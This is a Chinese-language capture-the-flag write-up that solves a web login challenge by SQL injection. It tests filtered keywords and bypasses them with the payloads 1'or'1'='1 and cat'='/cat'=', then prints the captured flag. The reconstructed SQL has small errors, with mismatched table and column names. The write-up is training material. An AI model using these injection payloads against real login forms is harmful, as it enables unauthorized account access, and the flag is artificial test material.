实验吧CTF---Web篇
1. 打开登录地址(http://ctf5.shiyanbar.com/web/wonderkun/web/index.html),发现为一个登录界面,第一想到的是查看源代码,没有发现其他信息,然后输入万能密码1'or'1'='1,发现过滤了or ,但未过滤单引号(‘)等,如下图:
经过一些列测试,发现不但过滤了or,并且过滤了/ # -- select | union等。
猜测原SQL语句可能为:
select * form user where username = ' ' and password = ' '
在Mysql上创建user表模拟该登录表的信息:
create database test; //创建test数据库 use test; create table user(username varchar(8), password varchar(32)); //创建user表 insert into user(username, password) values('test','123456'); //插入数据 select * from user where name = 'cat'='' and passwd = 'cat'=''; 可成功执行
如下图所示,可成功执行并返回数据库信息:
组合后代码为: select * from user where name = 'cat'='' and passwd = 'cat'=''; 即payload: cat'='/cat'='
可成功登录并获取flag: ctf{51d1bf8fb65a8c2406513ee8f52283e7}
